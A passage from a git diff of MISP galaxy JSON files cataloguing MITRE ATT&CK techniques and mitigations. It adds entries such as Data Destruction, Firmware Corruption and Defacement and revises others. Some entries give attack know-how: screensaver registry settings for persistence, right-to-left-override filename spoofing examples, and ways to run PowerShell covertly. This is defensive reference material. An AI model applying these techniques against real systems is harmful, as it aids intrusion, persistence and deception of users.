"Credential pharming - T1374" }, { - "description": "An adversary could download a legitimate app, disassemble it, add malicious code, and then reassemble the app, for example as described by Zhou and Jiang in (Citation: Zhou). The app would appear to be the original app but contain additional malicious functionality. The adversary could then publish this app to app stores or use another delivery technique.", + "description": "An adversary could download a legitimate app, disassemble it, add malicious code, and then reassemble the app(Citation: Zhou). The app would appear to be the original app but contain additional malicious functionality. The adversary could then publish this app to app stores or use another delivery technique.", "meta": { "external_id": "APP-14", "kill_chain": [ @@ -9729,6 +10262,113 @@ "uuid": "a93ccb8f-3996-42e2-b7c7-bb599d4e205f", "value": "Repackaged Application - T1444" }, + { + "description": "Adversaries may destroy data data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\n\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018)", + "meta": { + "external_id": "T1485", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "File monitoring", + "Process command-line parameters", + "Process monitoring" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1485", + "https://www.symantec.com/connect/blogs/shamoon-attacks", + "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html", + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf", + "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", + "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" + ] + }, + "uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "value": "Data Destruction - T1485" + }, + { + "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.", + "meta": { + "external_id": "T1495", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "BIOS", + "Component firmware" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1495", + "https://www.symantec.com/security-center/writeup/2000-122010-2655-99", + "http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research" + ] + }, + "uuid": "f5bb433e-bdf6-4781-84bc-35e97e43be89", + "value": "Firmware Corruption - T1495" + }, + { + "description": "Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. \n\nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.", + "meta": { + "external_id": "T1496", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Process use of network", + "Process monitoring", + "Network protocol analysis", + "Network device logs" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1496", + "https://securelist.com/lazarus-under-the-hood/77908/" + ] + }, + "uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "value": "Resource Hijacking - T1496" + }, + { + "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)", + "meta": { + "external_id": "T1489", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Process command-line parameters", + "Process monitoring", + "Windows Registry", + "API monitoring" + ], + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1489", + "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://www.secureworks.com/research/wcry-ransomware-analysis" + ] + }, + "uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "value": "Service Stop - T1489" + }, { "description": "During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.\n\nAdversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).", "meta": { @@ -9833,7 +10473,7 @@ "value": "Mshta - T1170" }, { - "description": "Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension. (Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.exe is located in C:\\Windows\\System32\\ along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaverTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)", + "description": "Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\ on 64-bit Windows systems, along with screensavers included with base Windows installations. \n\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaverTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)", "meta": { "external_id": "T1180", "kill_chain": [ @@ -9963,7 +10603,7 @@ "value": "Kerberoasting - T1208" }, { - "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.\n\nOne variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs. This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.\n\n\n### Windows\nIn another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)\n\nAn example of abuse of trusted locations in Windows would be the C:\\Windows\\System32 directory. Examples of trusted binary names that can be given to malicious binares include \"explorer.exe\" and \"svchost.exe\".\n\n### Linux\nAnother variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)\n\nAn example of abuse of trusted locations in Linux would be the /bin directory. Examples of trusted binary names that can be given to malicious binares include \"rsyncd\" and \"dbus-inotifier\". (Citation: Fysbis Palo Alto Analysis) (Citation: Fysbis Dr Web Analysis)", + "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.\n\nOne variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.\n\nA third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. \n\n### Windows\nIn another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)\n\nAn example of abuse of trusted locations in Windows would be the C:\\Windows\\System32 directory. Examples of trusted binary names that can be given to malicious binares include \"explorer.exe\" and \"svchost.exe\".\n\n### Linux\nAnother variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)\n\nAn example of abuse of trusted locations in Linux would be the /bin directory. Examples of trusted binary names that can be given to malicious binares include \"rsyncd\" and \"dbus-inotifier\". (Citation: Fysbis Palo Alto Analysis) (Citation: Fysbis Dr Web Analysis)", "meta": { "external_id": "T1036", "kill_chain": [ @@ -9981,18 +10621,23 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1036", + "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", + "https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/", + "https://securelist.com/zero-day-vulnerability-in-telegram/83800/", "https://www.endgame.com/blog/how-hunt-masquerade-ball", "https://www.f-secure.com/documents/996508/1030745/CozyDuke", "https://www.welivesecurity.com/2016/03/30/meet-remaiten-a-linux-bot-on-steroids-targeting-routers-and-potentially-other-iot-devices/", "https://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/", - "https://vms.drweb.com/virus/?i=4276269" + "https://vms.drweb.com/virus/?i=4276269", + "https://twitter.com/ItsReallyNick/status/1055321652777619457" ] }, "uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "value": "Masquerading - T1036" }, { - "description": "Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macos being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. (Citation: Metasploit) (Citation: Metasploit), (Citation: Veil) (Citation: Veil), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", + "description": "Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. (Citation: Metasploit) (Citation: Metasploit), (Citation: Veil) (Citation: Veil), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", "meta": { "external_id": "T1064", "kill_chain": [ @@ -10011,10 +10656,10 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1064", - "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", "http://www.metasploit.com", "https://www.veil-framework.com/framework/", "https://github.com/mattifestation/PowerSploit", + "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", "https://www.uperesia.com/analyzing-malicious-office-documents" ] }, @@ -10047,13 +10692,16 @@ "value": "Bootkit - T1067" }, { - "description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including Empire, (Citation: Github PowerShell Empire) PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)", + "description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)", "meta": { "external_id": "T1086", "kill_chain": [ "mitre-attack:execution" ], "mitre_data_sources": [ + "PowerShell logs", + "Loaded DLLs", + "DLL monitoring", "Windows Registry", "File monitoring", "Process monitoring", @@ -10064,12 +10712,14 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1086", - "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", "https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx", "https://github.com/mattifestation/PowerSploit", "https://github.com/jaredhaight/PSAttack", - "https://github.com/PowerShellEmpire/Empire", - "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf" + "http://www.sixdub.net/?p=367", + "https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/", + "https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/", + "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html" ] }, "uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", @@ -10119,8 +10769,9 @@ "refs": [ "https://attack.mitre.org/techniques/T1117", "https://support.microsoft.com/en-us/kb/249873", - "https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html", - "https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/" + "https://web.archive.org/web/20161128183535/https://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html", + "https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/", + "https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html" ] }, "uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", @@ -10299,7 +10950,38 @@ "value": "HISTCONTROL - T1148" }, { - "description": "macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program.\nAppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. \n\nAdversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command lie via osascript /path/to/script or osascript -e \"script here\".", + "description": "Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. \n\n### Internal\nAn adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. While internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)\n\n### External \nWebsites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) Defacement may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)\n", + "meta": { + "external_id": "T1491", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Packet capture", + "Web application firewall logs", + "Web logs", + "Packet capture" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1491", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf", + "https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf", + "https://torrentfreak.com/anonymous-hackers-deface-russian-govt-site-to-protest-web-blocking-nsfw-180512/", + "https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf" + ] + }, + "uuid": "5909f20f-3c39-4795-be06-ef1ea40d350b", + "value": "Defacement - T1491" + }, + { + "description": "macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program.\nAppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. \n\nAdversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\".", "meta": { "external_id": "T1155", "kill_chain": [ @@ -10346,7 +11028,7 @@ "value": "Sudo - T1169" }, { - "description": "Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. Hooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. (Citation: Endgame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.\n\nMalicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)\n\nHooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)", + "description": "Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. \n\nHooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. (Citation: Endgame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.\n\nMalicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)\n\nHooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)", "meta": { "external_id": "T1179", "kill_chain": [ @@ -10367,20 +11049,20 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1179", - "https://www.adlice.com/userland-rootkits-part-1-iat-hooks/", - "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", - "https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/", - "http://www.gmer.net/", - "https://www.exploit-db.com/docs/17802.pdf", - "https://github.com/jay/gethooks", - "https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/", "https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx", - "https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx", - "https://github.com/prekageo/winhook", - "https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis", + "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://www.adlice.com/userland-rootkits-part-1-iat-hooks/", + "https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/", + "https://www.exploit-db.com/docs/17802.pdf", "https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf", "https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html", - "https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/" + "https://github.com/prekageo/winhook", + "https://github.com/jay/gethooks", + "https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/", + "https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/", + "http://www.gmer.net/", + "https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx", + "https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis" ] }, "uuid": "66f73398-8394-4711-85e5-34c8540b22a5", @@ -10401,5 +11083,5 @@ "value": "DNSCalc - T1324" } ], - "version": 8 + "version": 9 } diff --git a/clusters/mitre-course-of-action.json b/clusters/mitre-course-of-action.json index 23efe07..8483059 100644 --- a/clusters/mitre-course-of-action.json +++ b/clusters/mitre-course-of-action.json @@ -343,14 +343,14 @@ "type": "mitigates" }, { - "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483", + "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" }, { - "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", + "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1016,7 +1016,7 @@ "value": "Signed Script Proxy Execution Mitigation - T1216" }, { - "description": "Certain signed binaries that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.", + "description": "Certain signed binaries that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these binaries if they are not required for a given system or network to prevent potential misuse by adversaries. If these binaries are required for use, then restrict execution of them to privileged accounts or groups that need to use them to lessen the opportunities for malicious use.", "meta": { "external_id": "T1218", "refs": [ @@ -1121,6 +1121,74 @@ "uuid": "84d633a4-dd93-40ca-8510-40238c021931", "value": "Hidden Files and Directories Mitigation - T1158" }, + { + "description": "Consider implementing IT disaster recovery plans that contain procedures for regularly taking and testing data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP)\n\nIn some cases, the means to decrypt files affected by a ransomware campaign is released to the public. Research trusted sources for public releases of decryptor tools/keys to reverse the effects of ransomware.\n\nIdentify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)", + "meta": { + "external_id": "T1486", + "refs": [ + "https://attack.mitre.org/techniques/T1486", + "https://www.ready.gov/business/implementation/IT", + "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx", + "https://technet.microsoft.com/en-us/library/ee791851.aspx" + ] + }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "429a5c0c-e132-45c0-a4aa-c1f736c92a1c", + "value": "Data Encrypted for Impact Mitigation - T1486" + }, + { + "description": "When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter 